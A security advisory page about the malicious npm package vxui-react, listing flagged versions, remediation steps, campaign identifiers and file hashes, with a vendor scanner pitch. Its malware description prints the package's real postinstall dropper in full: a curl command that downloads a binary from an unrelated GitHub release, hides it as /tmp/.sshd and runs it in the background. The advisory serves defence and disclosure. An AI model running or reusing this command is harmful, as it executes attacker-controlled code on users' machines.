Which versions of vxui-react are malicious?

The following npm versions of vxui-react are flagged malicious: 1.3.2, 1.3.3, 1.3.4. Treat any of these as compromised.

How do I remediate vxui-react if I installed it?

Remove vxui-react from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is vxui-react part of a known attack campaign?

Yes — vxui-react is associated with the IN-MAL-2026-004870, IN-MAL-2026-004869, IN-MAL-2026-005605, IN-MAL-2026-005604, IN-MAL-2026-005606, IN-MAL-2026-005607 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect vxui-react in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking vxui-react and packages like it before any post-install script runs.

Malicious package

vxui-reactnpm

Malicious code in vxui-react (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4793

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall vxui-react

What this malware does

On npm install, package.json's postinstall script runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &. The fetch disables TLS verification (-k), silences errors, points at an unpinned latest release on a GitHub account (parikhpreyash4) unrelated to the package's declared repository (tmplink/vxui_react), verifies no hash, drops the binary at a hidden path masquerading as the ssh daemon (/tmp/.sshd), and backgrounds it so the install completes without surfacing the child process. Every installer running npm install vxui-react thereby executes arbitrary attacker-controlled code on their machine. The package additionally lists itself (vxui-react: ^1.3.1) in its own dependencies, an unusual shape consistent with namespace/dependency-graph manipulation; the dropper above is the primary harm.

Malicious versions

3 flagged

1.3.21.3.31.3.4

Indicators of compromise (SHA-256)

13bbe33aacfc1fbc5bfb31899dfb16006499c3f15818486d1c5f4fd03922b0bc

bde616ebc21909bfa386bf8e49438da710f48b62ae3127f2a7259c71557a4242

1623f4ac033646e144ec5ec608a905683ddbe808470efc314b84ab3c669f37ab

4a420b4b3937eae5d068ca9bdf7903a1f88ef0e39ed871eef73d0ee87cce83e6

4af2c5e995ae069d3037f1310d055fac142dd6bb2ccd5ecb7e7f9a518e8022f0

80e93f9ee628036f955e445139afecbfef7b46471156cd771969fb78f06df259

Frequently asked questions

No. vxui-react on npm has been identified as a malicious package (versions 1.3.2, 1.3.3, 1.3.4 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-004870IN-MAL-2026-004869IN-MAL-2026-005605IN-MAL-2026-005604IN-MAL-2026-005606IN-MAL-2026-005607

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection